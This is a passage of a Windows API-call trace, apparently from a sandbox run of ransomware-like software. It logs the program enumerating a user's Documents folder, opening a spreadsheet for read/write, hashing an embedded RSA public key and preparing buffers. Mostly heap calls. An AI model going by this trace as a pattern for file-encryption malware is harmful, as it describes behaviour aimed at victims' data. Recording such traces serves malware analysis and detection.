out: hHeap=0x2c0000) returned 1 [0196.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0197.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0197.000] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\") returned="HIm fL\\" [0197.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0197.000] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\") returned="8NNLi0kOEoM-mpUM785\\" [0197.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea578 [0197.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.001] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0197.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea578 | out: hHeap=0x2c0000) returned 1 [0197.001] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0197.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.002] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0197.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.002] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0197.002] PathFindFileNameW (pszPath="") returned="" [0197.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0197.002] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58435230, ftCreationTime.dwHighDateTime=0x1d8a0a3, ftLastAccessTime.dwLowDateTime=0xd26626c0, ftLastAccessTime.dwHighDateTime=0x1d8a664, ftLastWriteTime.dwLowDateTime=0xd26626c0, ftLastWriteTime.dwHighDateTime=0x1d8a664, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0197.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0197.007] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58435230, ftCreationTime.dwHighDateTime=0x1d8a0a3, ftLastAccessTime.dwLowDateTime=0xd26626c0, ftLastAccessTime.dwHighDateTime=0x1d8a664, ftLastWriteTime.dwLowDateTime=0xd26626c0, ftLastWriteTime.dwHighDateTime=0x1d8a664, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.007] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dad21e0, ftCreationTime.dwHighDateTime=0x1d89d31, ftLastAccessTime.dwLowDateTime=0xc7ede40, ftLastAccessTime.dwHighDateTime=0x1d8a17b, ftLastWriteTime.dwLowDateTime=0xc7ede40, ftLastWriteTime.dwHighDateTime=0x1d8a17b, nFileSizeHigh=0x0, nFileSizeLow=0x928b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="22cygPIJe.ods", cAlternateFileName="22CYGP~1.ODS")) returned 1 [0197.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0197.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0197.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0197.007] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\22cygPIJe.ods") returned=".ods" [0197.007] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\22cygPIJe.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\22cygpije.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.015] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=37515) returned 1 [0197.016] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.019] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9265, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.020] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.022] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.022] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x928b, lpOverlapped=0x0) returned 1 [0197.024] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.024] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.024] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.024] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b640) returned 1 [0197.025] CryptCreateHash (in: hProv=0x31b640, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.025] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.025] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.025] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.026] GetLastError () returned 0x0 [0197.026] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.026] CryptReleaseContext (hProv=0x31b640, dwFlags=0x0) returned 1 [0197.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.026] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.026] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.026] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9290) returned 0x2af5168 [0197.027] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea578 [0197.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66b0 [0197.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea5c0 [0197.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66c8 [0197.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66f8 [0197.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6758 [0197.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6710 [0197.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.028] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0197.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0197.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6758 [0197.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0197.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6710 [0197.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae66f8 [0197.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0197.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0197.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0197.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0197.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.031] GetCurrentThreadId () returned 0x5d8 [0197.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af24b0 [0197.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0197.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0197.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.032] GetCurrentThreadId () returned 0x5d8 [0197.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6758 [0197.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66f8 [0197.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0197.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6710 [0197.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66e0 [0197.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6770 [0197.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0197.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6740 [0197.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6728 [0197.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6788 [0197.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0197.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6728 [0197.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0197.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0197.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 